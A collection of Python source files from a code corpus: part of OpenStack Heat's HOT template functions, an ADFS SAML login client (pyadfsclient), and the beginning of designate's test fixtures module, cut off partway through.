else:
return None
class GetAttAllAttributes(GetAtt):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attributes_name>
- <path1>
- ...
where <attributes_name> and <path1>, ... are optional arguments. If there
is no <attributes_name>, result will be dict of all resource's attributes.
Else function returns resolved resource's attribute.
"""
def _parse_args(self):
if not self.args:
raise ValueError(_('Arguments to "%s" can be of the next '
'forms: [resource_name] or '
'[resource_name, attribute, (path), ...]'
) % self.fn_name)
elif isinstance(self.args, collections.Sequence):
if len(self.args) > 1:
return super(GetAttAllAttributes, self)._parse_args()
else:
return self.args[0], None
else:
raise TypeError(_('Argument to "%s" must be a list') %
self.fn_name)
def dep_attrs(self, resource_name):
"""Check if there is no attribute_name defined, return empty chain."""
if self._attribute is not None:
return super(GetAttAllAttributes, self).dep_attrs(resource_name)
elif self._resource().name == resource_name:
res = self._resource()
attrs = six.iterkeys(res.attributes_schema)
else:
attrs = []
return itertools.chain(function.dep_attrs(self.args,
resource_name), attrs)
def result(self):
if self._attribute is None:
r = self._resource()
if (r.status in (r.IN_PROGRESS, r.COMPLETE) and
r.action in (r.CREATE, r.ADOPT, r.SUSPEND, r.RESUME,
r.UPDATE, r.CHECK, r.SNAPSHOT)):
return r.FnGetAtts()
else:
return None
else:
return super(GetAttAllAttributes, self).result()
def _allow_without_attribute_name(self):
return True
class Replace(cfn_funcs.Replace):
"""A function for performing string substitutions.
Takes the form::
str_replace:
template: <key_1> <key_2>
params:
<key_1>: <value_1>
<key_2>: <value_2>
...
And resolves to::
"<value_1> <value_2>"
This is implemented using Python's str.replace on each key. The order in
which replacements are performed is undefined.
"""
def _parse_args(self):
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map') %
self.fn_name)
try:
mapping = self.args['params']
string = self.args['template']
except (KeyError, TypeError):
example = ('''str_replace:
template: This is var1 template var2
params:
var1: a
var2: string''')
raise KeyError(_('"str_replace" syntax should be %s') %
example)
else:
return mapping, string
class ReplaceJson(Replace):
"""A function for performing string substitutions.
Behaves the same as Replace, but tolerates non-string parameter
values, e.g map/list - these are serialized as json before doing
the string substitution.
"""
def result(self):
template = function.resolve(self._string)
mapping = function.resolve(self._mapping)
if not isinstance(template, six.string_types):
raise TypeError(_('"%s" template must be a string') % self.fn_name)
if not isinstance(mapping, collections.Mapping):
raise TypeError(_('"%s" params must be a map') % self.fn_name)
def replace(string, change):
placeholder, value = change
if not isinstance(placeholder, six.string_types):
raise TypeError(_('"%s" param placeholders must be strings') %
self.fn_name)
if value is None:
value = ''
if not isinstance(value,
(six.string_types, six.integer_types,
float, bool)):
if isinstance(value,
(collections.Mapping, collections.Sequence)):
try:
value = jsonutils.dumps(value, default=None)
except TypeError:
raise TypeError(_('"%(name)s" params must be strings, '
'numbers, list or map. '
'Failed to json serialize %(value)s'
) % {'name': self.fn_name,
'value': value})
else:
raise TypeError(_('"%s" params must be strings, numbers, '
'list or map.') % self.fn_name)
return string.replace(placeholder, six.text_type(value))
return six.moves.reduce(replace, six.iteritems(mapping), template)
class GetFile(function.Function):
"""A function for including a file inline.
Takes the form::
get_file: <file_key>
And resolves to the content stored in the files dictionary under the given
key.
"""
def __init__(self, stack, fn_name, args):
super(GetFile, self).__init__(stack, fn_name, args)
self.files = self.stack.t.files
def result(self):
args = function.resolve(self.args)
if not (isinstance(args, six.string_types)):
raise TypeError(_('Argument to "%s" must be a string') %
self.fn_name)
f = self.files.get(args)
if f is None:
fmt_data = {'fn_name': self.fn_name,
'file_key': args}
raise ValueError(_('No content found in the "files" section for '
'%(fn_name)s path: %(file_key)s') % fmt_data)
return f
class Join(cfn_funcs.Join):
"""A function for joining strings.
Takes the form::
{ "list_join" : [ "<delim>", [ "<string_1>", "<string_2>", ... ] ] }
And resolves to::
"<string_1><delim><string_2><delim>..."
"""
class JoinMultiple(function.Function):
"""A function for joining one or more lists of strings.
Takes the form::
{ "list_join" : [ "<delim>", [ "<string_1>", "<string_2>", ... ] ] }
And resolves to::
"<string_1><delim><string_2><delim>..."
Optionally multiple lists may be specified, which will also be joined.
"""
def __init__(self, stack, fn_name, args):
super(JoinMultiple, self).__init__(stack, fn_name, args)
example = '"%s" : [ " ", [ "str1", "str2"] ...]' % fn_name
fmt_data = {'fn_name': fn_name,
'example': example}
if not isinstance(args, list):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % fmt_data)
try:
self._delim = args[0]
self._joinlists = args[1:]
if len(self._joinlists) < 1:
raise ValueError
except (IndexError, ValueError):
raise ValueError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % fmt_data)
def result(self):
r_joinlists = function.resolve(self._joinlists)
strings = []
for jl in r_joinlists:
if jl:
if (isinstance(jl, six.string_types) or
not isinstance(jl, collections.Sequence)):
raise TypeError(_('"%s" must operate on '
'a list') % self.fn_name)
strings += jl
delim = function.resolve(self._delim)
if not isinstance(delim, six.string_types):
raise TypeError(_('"%s" delimiter must be a string') %
self.fn_name)
def ensure_string(s):
msg = _('Items to join must be string, map or list not %s'
) % (repr(s)[:200])
if s is None:
return ''
elif isinstance(s, six.string_types):
return s
elif isinstance(s, (collections.Mapping, collections.Sequence)):
try:
return jsonutils.dumps(s, default=None)
except TypeError:
msg = _('Items to join must be string, map or list. '
'%s failed json serialization'
) % (repr(s)[:200])
raise TypeError(msg)
return delim.join(ensure_string(s) for s in strings)
class MapMerge(function.Function):
"""A function for merging maps.
Takes the form::
{ "map_merge" : [{'k1': 'v1', 'k2': 'v2'}, {'k1': 'v2'}] }
And resolves to::
{'k1': 'v2', 'k2': 'v2'}
"""
def __init__(self, stack, fn_name, args):
super(MapMerge, self).__init__(stack, fn_name, args)
example = (_('"%s" : [ { "key1": "val1" }, { "key2": "val2" } ]')
% fn_name)
self.fmt_data = {'fn_name': fn_name, 'example': example}
def result(self):
args = function.resolve(self.args)
if not isinstance(args, collections.Sequence):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
def ensure_map(m):
if m is None:
return {}
elif isinstance(m, collections.Mapping):
return m
else:
msg = _('Incorrect arguments: Items to merge must be maps.')
raise TypeError(msg)
ret_map = {}
for m in args:
ret_map.update(ensure_map(m))
return ret_map
class ResourceFacade(cfn_funcs.ResourceFacade):
"""A function for retrieving data in a parent provider template.
A function for obtaining data from the facade resource from within the
corresponding provider template.
Takes the form::
resource_facade: <attribute_type>
where the valid attribute types are "metadata", "deletion_policy" and
"update_policy".
"""
_RESOURCE_ATTRIBUTES = (
METADATA, DELETION_POLICY, UPDATE_POLICY,
) = (
'metadata', 'deletion_policy', 'update_policy'
)
class Removed(function.Function):
"""This function existed in previous versions of HOT, but has been removed.
Check the HOT guide for an equivalent native function.
"""
def validate(self):
exp = (_("The function %s is not supported in this version of HOT.") %
self.fn_name)
raise exception.InvalidTemplateVersion(explanation=exp)
def result(self):
return super(Removed, self).result()
class Repeat(function.Function):
"""A function for iterating over a list of items.
Takes the form::
repeat:
template:
<body>
for_each:
<var>: <list>
The result is a new list of the same size as <list>, where each element
is a copy of <body> with any occurrences of <var> replaced with the
corresponding item of <list>.
"""
def __init__(self, stack, fn_name, args):
super(Repeat, self).__init__(stack, fn_name, args)
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map') %
self.fn_name)
# We don't check for invalid keys appearing here, which is wrong but
# it's probably too late to change
try:
self._for_each = self.args['for_each']
self._template = self.args['template']
except KeyError:
example = ('''repeat:
template: This is %var%
for_each:
%var%: ['a', 'b', 'c']''')
raise KeyError(_('"repeat" syntax should be %s') % example)
def validate(self):
super(Repeat, self).validate()
if not isinstance(self._for_each, function.Function):
if not isinstance(self._for_each, collections.Mapping):
raise TypeError(_('The "for_each" argument to "%s" must '
'contain a map') % self.fn_name)
if not all(self._valid_list(v) for v in self._for_each.values()):
raise TypeError(_('The values of the "for_each" argument '
'to "%s" must be lists') % self.fn_name)
@staticmethod
def _valid_list(arg):
return (isinstance(arg, (collections.Sequence,
function.Function)) and
not isinstance(arg, six.string_types))
def _do_replacement(self, keys, values, template):
if isinstance(template, six.string_types):
for (key, value) in zip(keys, values):
template = template.replace(key, value)
return template
elif isinstance(template, collections.Sequence):
return [self._do_replacement(keys, values, elem)
for elem in template]
elif isinstance(template, collections.Mapping):
return dict((self._do_replacement(keys, values, k),
self._do_replacement(keys, values, v))
for (k, v) in template.items())
def result(self):
for_each = function.resolve(self._for_each)
if not all(self._valid_list(l) for l in for_each.values()):
raise TypeError(_('The values of the "for_each" argument to '
'"%s" must be lists') % self.fn_name)
template = function.resolve(self._template)
keys, lists = six.moves.zip(*for_each.items())
return [self._do_replacement(keys, replacements, template)
for replacements in itertools.product(*lists)]
class Digest(function.Function):
"""A function for performing digest operations.
Takes the form::
digest:
- <algorithm>
- <value>
Valid algorithms are the ones provided by natively by hashlib (md5, sha1,
sha224, sha256, sha384, and sha512) or any one provided by OpenSSL.
"""
def validate_usage(self, args):
if not (isinstance(args, list) and
all([isinstance(a, six.string_types) for a in args])):
msg = _('Argument to function "%s" must be a list of strings')
raise TypeError(msg % self.fn_name)
if len(args) != 2:
msg = _('Function "%s" usage: ["<algorithm>", "<value>"]')
raise ValueError(msg % self.fn_name)
if six.PY3:
algorithms = hashlib.algorithms_available
else:
algorithms = hashlib.algorithms
if args[0].lower() not in algorithms:
msg = _('Algorithm must be one of %s')
raise ValueError(msg % six.text_type(algorithms))
def digest(self, algorithm, value):
_hash = hashlib.new(algorithm)
_hash.update(six.b(value))
return _hash.hexdigest()
def result(self):
args = function.resolve(self.args)
self.validate_usage(args)
return self.digest(*args)
class StrSplit(function.Function):
"""A function for splitting delimited strings into a list.
Optionally extracting a specific list member by index.
Takes the form::
str_split: [delimiter, string, <index> ]
or::
str_split:
- delimiter
- string
- <index>
If <index> is specified, the specified list item will be returned
otherwise, the whole list is returned, similar to get_attr with
path based attributes accessing lists.
"""
def __init__(self, stack, fn_name, args):
super(StrSplit, self).__init__(stack, fn_name, args)
example = '"%s" : [ ",", "apples,pears", <index>]' % fn_name
self.fmt_data = {'fn_name': fn_name,
'example': example}
self.fn_name = fn_name
if isinstance(args, (six.string_types, collections.Mapping)):
raise TypeError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
def result(self):
args = function.resolve(self.args)
try:
delim = args.pop(0)
str_to_split = args.pop(0)
except (AttributeError, IndexError):
raise ValueError(_('Incorrect arguments to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
split_list = str_to_split.split(delim)
# Optionally allow an index to be specified
if args:
try:
index = int(args.pop(0))
except ValueError:
raise ValueError(_('Incorrect index to "%(fn_name)s" '
'should be: %(example)s') % self.fmt_data)
else:
try:
res = split_list[index]
except IndexError:
raise ValueError(_('Incorrect index to "%(fn_name)s" '
'should be between 0 and '
'%(max_index)s')
% {'fn_name': self.fn_name,
'max_index': len(split_list) - 1})
else:
res = split_list
return res
class Yaql(function.Function):
"""A function for executing a yaql expression.
Takes the form::
yaql:
expression:
<body>
data:
<var>: <list>
Evaluates expression <body> on the given data.
"""
_parser = None
@classmethod
def get_yaql_parser(cls):
if cls._parser is None:
global_options = {
'yaql.limitIterators': cfg.CONF.yaql.limit_iterators,
'yaql.memoryQuota': cfg.CONF.yaql.memory_quota
}
cls._parser = yaql.YaqlFactory().create(global_options)
return cls._parser
def __init__(self, stack, fn_name, args):
super(Yaql, self).__init__(stack, fn_name, args)
self.parser = self.get_yaql_parser()
self.context = yaql.create_context()
if not isinstance(self.args, collections.Mapping):
raise TypeError(_('Arguments to "%s" must be a map.') %
self.fn_name)
try:
self._expression = self.args['expression']
self._data = self.args.get('data', {})
for arg in six.iterkeys(self.args):
if arg not in ['expression', 'data']:
raise KeyError
except (KeyError, TypeError):
example = ('''%s:
expression: $.data.var1.sum()
data:
var1: [3, 2, 1]''') % self.fn_name
raise KeyError(_('"%(name)s" syntax should be %(example)s') % {
'name': self.fn_name, 'example': example})
def validate_expression(self, expression):
try:
self.parser(expression)
except exceptions.YaqlException as yex:
raise ValueError(_('Bad expression %s.') % yex)
def validate(self):
super(Yaql, self).validate()
if not isinstance(self._data,
(collections.Mapping, function.Function)):
raise TypeError(_('The "data" argument to "%s" must contain '
'a map.') % self.fn_name)
if not isinstance(self._expression,
(six.string_types, function.Function)):
raise TypeError(_('The "expression" argument to %s must '
'contain a string or a '
'function.') % self.fn_name)
if isinstance(self._expression, six.string_types):
self.validate_expression(self._expression)
def result(self):
data = function.resolve(self._data)
if not isinstance(data, collections.Mapping):
raise TypeError(_('The "data" argument to "%s" must contain '
'a map.') % self.fn_name)
ctxt = {'data': data}
self.context['$'] = ctxt
if not isinstance(self._expression, six.string_types):
self._expression = function.resolve(self._expression)
self.validate_expression(self._expression)
return self.parser(self._expression).evaluate(context=self.context)
| apache-2.0 | 9,040,869,011,473,077,000 | 32.959799 | 79 | 0.531296 | false |
zaccone/pyadfsclient | adfs.py | 1 | 9572 | import datetime
import string
import urllib2
import uuid
import requests
from lxml import etree
class ADFSClient(object):
HEADER_SOAP = {"Content-Type": "application/soap+xml; charset=utf-8"}
HEADER_X_FORM = {"Content-Type": "application/x-www-form-urlencoded"}
ASSERTION_NAMESPACES = {
's': 'http://www.w3.org/2003/05/soap-envelope',
't': 'http://docs.oasis-open.org/ws-sx/ws-trust/200512'
}
ADFS_ASSERTION_XPATH = ('/s:Envelope/s:Body'
'/t:RequestSecurityTokenResponseCollection'
'/t:RequestSecurityTokenResponse')
def __init__(self,
username, password,
adfs_url,
sp_endpoint,
sp_url,
valid=3600,
verify=True):
self.username = username
self.password = password
self.adfs_url = adfs_url
self.sp_endpoint = sp_endpoint
self.sp_url = sp_url
self.valid = valid
self.verify = verify
self.session = requests.Session()
def _token_dates(self, fmt='%Y-%m-%dT%H:%M:%S.%fZ'):
date_created = datetime.datetime.utcnow()
date_expires = date_created + datetime.timedelta(
seconds=self.valid)
return [_time.strftime(fmt) for _time in (date_created, date_expires)]
@property
def _uuid4(self):
return str(uuid.uuid4())
@staticmethod
def _first(l):
return l[0]
def _prepare_adfs_request(self):
"""Build the ADFS Request Security Token SOAP message.
Some values like username or password are inserted in the request.
"""
NAMESPACES = {
's': 'http://www.w3.org/2003/05/soap-envelope',
'a': 'http://www.w3.org/2005/08/addressing',
'u': ('http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd')
}
WSS_SECURITY_NAMESPACE = {
'o': ('http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd')
}
TRUST_NAMESPACE = {
'trust': 'http://docs.oasis-open.org/ws-sx/ws-trust/200512'
}
WSP_NAMESPACE = {
'wsp': 'http://schemas.xmlsoap.org/ws/2004/09/policy'
}
WSA_NAMESPACE = {
'wsa': 'http://www.w3.org/2005/08/addressing'
}
root = etree.Element(
'{http://www.w3.org/2003/05/soap-envelope}Envelope',
nsmap=NAMESPACES)
header = etree.SubElement(
root, '{http://www.w3.org/2003/05/soap-envelope}Header')
action = etree.SubElement(
header, "{http://www.w3.org/2005/08/addressing}Action")
action.set(
"{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
action.text = ('http://docs.oasis-open.org/ws-sx/ws-trust/200512'
'/RST/Issue')
messageID = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}MessageID')
messageID.text = 'urn:uuid:' + self._uuid4
replyID = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}ReplyTo')
address = etree.SubElement(
replyID, '{http://www.w3.org/2005/08/addressing}Address')
address.text = 'http://www.w3.org/2005/08/addressing/anonymous'
to = etree.SubElement(
header, '{http://www.w3.org/2005/08/addressing}To')
to.set("{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
to.text = self.adfs_url
security = etree.SubElement(
header, '{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd}Security',
nsmap=WSS_SECURITY_NAMESPACE)
security.set(
"{http://www.w3.org/2003/05/soap-envelope}mustUnderstand", "1")
timestamp = etree.SubElement(
security, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Timestamp'))
timestamp.set(
('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Id'), '_0')
created = etree.SubElement(
timestamp, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Created'))
expires = etree.SubElement(
timestamp, ('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-utility-1.0.xsd}Expires'))
created.text, expires.text = self._token_dates()
usernametoken = etree.SubElement(
security, '{http://docs.oasis-open.org/wss/2004/01/oasis-200401-'
'wss-wssecurity-secext-1.0.xsd}UsernameToken')
usernametoken.set(
('{http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-'
'wssecurity-utility-1.0.xsd}u'), "uuid-%s-1" % self._uuid4)
username = etree.SubElement(
usernametoken, ('{http://docs.oasis-open.org/wss/2004/01/oasis-'
'200401-wss-wssecurity-secext-1.0.xsd}Username'))
username.text = self.username
password = etree.SubElement(
usernametoken, ('{http://docs.oasis-open.org/wss/2004/01/oasis-'
'200401-wss-wssecurity-secext-1.0.xsd}Password'),
Type=('http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-'
'username-token-profile-1.0#PasswordText'))
password.text = self.password
body = etree.SubElement(
root, "{http://www.w3.org/2003/05/soap-envelope}Body")
request_security_token = etree.SubElement(
body, ('{http://docs.oasis-open.org/ws-sx/ws-trust/200512}'
'RequestSecurityToken'), nsmap=TRUST_NAMESPACE)
applies_to = etree.SubElement(
request_security_token,
'{http://schemas.xmlsoap.org/ws/2004/09/policy}AppliesTo',
nsmap=WSP_NAMESPACE)
endpoint_reference = etree.SubElement(
applies_to,
'{http://www.w3.org/2005/08/addressing}EndpointReference',
nsmap=WSA_NAMESPACE)
wsa_address = etree.SubElement(
endpoint_reference,
'{http://www.w3.org/2005/08/addressing}Address')
wsa_address.text = self.sp_endpoint
keytype = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}KeyType')
keytype.text = ('http://docs.oasis-open.org/ws-sx/'
'ws-trust/200512/Bearer')
request_type = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}RequestType')
request_type.text = ('http://docs.oasis-open.org/ws-sx/'
'ws-trust/200512/Issue')
token_type = etree.SubElement(
request_security_token,
'{http://docs.oasis-open.org/ws-sx/ws-trust/200512}TokenType')
token_type.text = 'urn:oasis:names:tc:SAML:1.0:assertion'
self.prepared_request = root
@property
def prepared_request_str(self):
try:
self._prepared_request_str
except AttributeError:
self._prepare_adfs_request()
# noinspection PyAttributeOutsideInit
self._prepared_request_str = etree.tostring(self.prepared_request)
finally:
return self._prepared_request_str
def _get_adfs_security_token(self):
adfs_response = self.session.post(
url=self.adfs_url, headers=self.HEADER_SOAP,
data=self.prepared_request_str, verify=self.verify)
# TODO(marek): check response
self.adfs_token = adfs_response.content
def _prepare_sp_request(self):
tree = etree.XML(self.adfs_token)
assertion = tree.xpath(self.ADFS_ASSERTION_XPATH,
namespaces=self.ASSERTION_NAMESPACES)
assertion = self._first(assertion)
assertion = etree.tostring(assertion)
# FIXME(marek): Dirty hack. I should not replace serialized XML object
# Unfortunately lxml doesn't allow for namespaces changing in-place
# and probably the only solution for now is to build the assertion
# from scratch and reuse values from the adfs security token.
assertion = string.replace(
assertion, 'http://docs.oasis-open.org/ws-sx/ws-trust/200512',
'http://schemas.xmlsoap.org/ws/2005/02/trust')
encoded_assertion = urllib2.quote(assertion.encode('utf8'))
self.encoded_assertion = 'wa=wsignin1.0&wresult=' + encoded_assertion
def _login_with_sp(self):
self.session.post(
url=self.sp_endpoint, data=self.encoded_assertion,
headers=self.HEADER_X_FORM, allow_redirects=False,
verify=self.verify)
# TODO(marek): check response code
def login(self):
self._prepare_adfs_request()
self._get_adfs_security_token()
self._prepare_sp_request()
self._login_with_sp()
def get_session(self):
return self.session
def get_cookie(self):
return self.session.cookies
def access_resource(self, **kwargs):
r = self.session.get(url=self.sp_url, verify=self.verify,
**kwargs)
if r.ok:
return r.content
| mit | -3,973,313,951,088,651,000 | 36.833992 | 79 | 0.579921 | false |
richm/designate | designate/tests/__init__.py | 1 | 16698 | # Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import fixtures
import functools
import os
import inspect
from migrate.versioning import repository
import shutil
import sqlalchemy
import tempfile
from migrate.versioning import api as versioning_api
from testtools import testcase
from oslo.config import cfg
from oslo.messaging import conffixture as messaging_fixture
from oslo.messaging.notify import _impl_test as test_notifier
from designate.openstack.common import log as logging
from designate.openstack.common.fixture import config
from designate.openstack.common import importutils
from designate.openstack.common import test
from designate import policy
from designate import utils
from designate.context import DesignateContext
from designate.tests import resources
from designate import exceptions
from designate.network_api import fake as fake_network_api
from designate import network_api
# NOTE: If eventlet isn't patched and an exception is raised, tests block
import eventlet
eventlet.monkey_patch(os=False)
LOG = logging.getLogger(__name__)
cfg.CONF.import_opt('storage_driver', 'designate.central',
group='service:central')
cfg.CONF.import_opt('backend_driver', 'designate.agent',
group='service:agent')
cfg.CONF.import_opt('auth_strategy', 'designate.api',
group='service:api')
cfg.CONF.import_opt('database_connection', 'designate.storage.impl_sqlalchemy',
group='storage:sqlalchemy')
class NotifierFixture(fixtures.Fixture):
def setUp(self):
super(NotifierFixture, self).setUp()
self.addCleanup(test_notifier.reset)
def get(self):
return test_notifier.NOTIFICATIONS
def clear(self):
return test_notifier.reset()
class ServiceFixture(fixtures.Fixture):
def __init__(self, svc_name, *args, **kw):
cls = importutils.import_class(
'designate.%s.service.Service' % svc_name)
        self.svc = cls.create(binary='designate-' + svc_name, *args, **kw)
def setUp(self):
super(ServiceFixture, self).setUp()
self.svc.start()
self.addCleanup(self.kill)
def kill(self):
try:
self.svc.kill()
except Exception:
pass
class PolicyFixture(fixtures.Fixture):
def setUp(self):
super(PolicyFixture, self).setUp()
self.addCleanup(policy.reset)
class DatabaseFixture(fixtures.Fixture):
fixtures = {}
@staticmethod
def get_fixture(repo_path):
if repo_path not in DatabaseFixture.fixtures:
DatabaseFixture.fixtures[repo_path] = DatabaseFixture(repo_path)
return DatabaseFixture.fixtures[repo_path]
def _mktemp(self):
_, path = tempfile.mkstemp(prefix='designate-', suffix='.sqlite',
dir='/tmp')
return path
def __init__(self, repo_path):
super(DatabaseFixture, self).__init__()
self.golden_db = self._mktemp()
engine = sqlalchemy.create_engine('sqlite:///%s' % self.golden_db)
repo = repository.Repository(repo_path)
versioning_api.version_control(engine, repository=repo)
versioning_api.upgrade(engine, repository=repo)
self.working_copy = self._mktemp()
self.url = 'sqlite:///%s' % self.working_copy
def setUp(self):
super(DatabaseFixture, self).setUp()
shutil.copyfile(self.golden_db, self.working_copy)
class NetworkAPIFixture(fixtures.Fixture):
def setUp(self):
super(NetworkAPIFixture, self).setUp()
self.api = network_api.get_network_api(cfg.CONF.network_api)
self.fake = fake_network_api
self.addCleanup(self.fake.reset_floatingips)
class TestCase(test.BaseTestCase):
quota_fixtures = [{
'resource': 'domains',
'hard_limit': 5,
}, {
'resource': 'records',
'hard_limit': 50,
}]
server_fixtures = [{
'name': 'ns1.example.org.',
}, {
'name': 'ns2.example.org.',
}, {
'name': 'ns2.example.org.',
}]
# The last tld is invalid
tld_fixtures = [{
'name': 'com',
}, {
'name': 'co.uk',
}, {
'name': 'com.',
}]
default_tld_fixtures = [{
'name': 'com',
}, {
'name': 'org',
}, {
'name': 'net',
}]
tsigkey_fixtures = [{
'name': 'test-key-one',
'algorithm': 'hmac-md5',
'secret': 'SomeSecretKey',
}, {
'name': 'test-key-two',
'algorithm': 'hmac-sha256',
'secret': 'AnotherSecretKey',
}]
# The last domain is invalid
domain_fixtures = [{
'name': 'example.com.',
'email': '[email protected]',
}, {
'name': 'example.net.',
'email': '[email protected]',
}, {
'name': 'example.org.',
'email': '[email protected]',
}, {
'name': 'invalid.com.....',
'email': '[email protected]',
}]
recordset_fixtures = {
'A': [
{'name': 'mail.%s', 'type': 'A'},
{'name': 'www.%s', 'type': 'A'},
],
'MX': [
{'name': 'mail.%s', 'type': 'MX'},
],
'SRV': [
{'name': '_sip._tcp.%s', 'type': 'SRV'},
{'name': '_sip._udp.%s', 'type': 'SRV'},
],
}
record_fixtures = {
'A': [
{'data': '192.0.2.1'},
{'data': '192.0.2.2'}
],
'MX': [
{'data': 'mail.example.org.', 'priority': 5},
{'data': 'mail.example.com.', 'priority': 10},
],
'SRV': [
{'data': '0 5060 server1.example.org.', 'priority': 5},
{'data': '1 5060 server2.example.org.', 'priority': 10},
]
}
ptr_fixtures = [
{'ptrdname': 'srv1.example.com.'},
{'ptrdname': 'srv1.example.net.'}
]
blacklist_fixtures = [{
'pattern': 'blacklisted.com.',
'description': 'This is a comment',
}, {
'pattern': 'blacklisted.net.'
}, {
'pattern': 'blacklisted.org.'
}]
def setUp(self):
super(TestCase, self).setUp()
self.useFixture(fixtures.FakeLogger('designate', level='DEBUG'))
self.CONF = self.useFixture(config.Config(cfg.CONF)).conf
self.messaging_conf = self.useFixture(
messaging_fixture.ConfFixture(cfg.CONF))
self.messaging_conf.transport_driver = 'fake'
self.config(notification_driver='test')
self.notifications = self.useFixture(NotifierFixture())
self.config(
storage_driver='sqlalchemy',
backend_driver='fake',
group='service:central'
)
self.config(
backend_driver='fake',
group='service:agent'
)
self.config(
auth_strategy='noauth',
group='service:api'
)
# The database fixture needs to be set up here (as opposed to isolated
# in a storage test case) because many tests end up using storage.
REPOSITORY = os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', 'storage',
'impl_sqlalchemy',
'migrate_repo'))
self.db_fixture = self.useFixture(
DatabaseFixture.get_fixture(REPOSITORY))
self.config(
database_connection=self.db_fixture.url,
group='storage:sqlalchemy'
)
self.config(network_api='fake')
self.config(
managed_resource_tenant_id='managing_tenant',
group='service:central')
self.CONF([], project='designate')
self.useFixture(PolicyFixture())
self.network_api = NetworkAPIFixture()
self.useFixture(self.network_api)
self.admin_context = self.get_admin_context()
# Config Methods
def config(self, **kwargs):
group = kwargs.pop('group', None)
for k, v in kwargs.iteritems():
cfg.CONF.set_override(k, v, group)
def policy(self, rules, default_rule='allow', overwrite=True):
# Inject an allow and deny rule
rules['allow'] = '@'
rules['deny'] = '!'
# Set the rules
policy.set_rules(rules, default_rule, overwrite)
# Other Utility Methods
def get_notifications(self):
return self.notifications.get()
def reset_notifications(self):
self.notifications.clear()
def start_service(self, svc_name, *args, **kw):
"""
Convenience method for starting a service!
"""
fixture = ServiceFixture(svc_name, *args, **kw)
self.useFixture(fixture)
return fixture.svc
# Context Methods
def get_context(self, **kwargs):
return DesignateContext(**kwargs)
def get_admin_context(self):
return DesignateContext.get_admin_context(
tenant=utils.generate_uuid(),
user=utils.generate_uuid())
# Fixture methods
def get_quota_fixture(self, fixture=0, values={}):
_values = copy.copy(self.quota_fixtures[fixture])
_values.update(values)
return _values
def get_server_fixture(self, fixture=0, values={}):
_values = copy.copy(self.server_fixtures[fixture])
_values.update(values)
return _values
def get_tld_fixture(self, fixture=0, values={}):
_values = copy.copy(self.tld_fixtures[fixture])
_values.update(values)
return _values
def get_default_tld_fixture(self, fixture=0, values={}):
_values = copy.copy(self.default_tld_fixtures[fixture])
_values.update(values)
return _values
def get_tsigkey_fixture(self, fixture=0, values={}):
_values = copy.copy(self.tsigkey_fixtures[fixture])
_values.update(values)
return _values
def get_domain_fixture(self, fixture=0, values={}):
_values = copy.copy(self.domain_fixtures[fixture])
_values.update(values)
return _values
def get_recordset_fixture(self, domain_name, type='A', fixture=0,
values={}):
_values = copy.copy(self.recordset_fixtures[type][fixture])
_values.update(values)
try:
_values['name'] = _values['name'] % domain_name
except TypeError:
pass
return _values
def get_record_fixture(self, recordset_type, fixture=0, values={}):
_values = copy.copy(self.record_fixtures[recordset_type][fixture])
_values.update(values)
return _values
def get_ptr_fixture(self, fixture=0, values={}):
_values = copy.copy(self.ptr_fixtures[fixture])
_values.update(values)
return _values
def get_zonefile_fixture(self, variant=None):
if variant is None:
f = 'example.com.zone'
else:
f = '%s_example.com.zone' % variant
path = os.path.join(resources.path, 'zonefiles', f)
with open(path) as zonefile:
return zonefile.read()
def get_blacklist_fixture(self, fixture=0, values={}):
_values = copy.copy(self.blacklist_fixtures[fixture])
_values.update(values)
return _values
def create_quota(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_quota_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_quota(context, values=values)
def create_server(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_server_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_server(context, values=values)
def create_tld(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_tld_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_tld(context, values=values)
def create_default_tld(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_default_tld_fixture(fixture=fixture, values=kwargs)
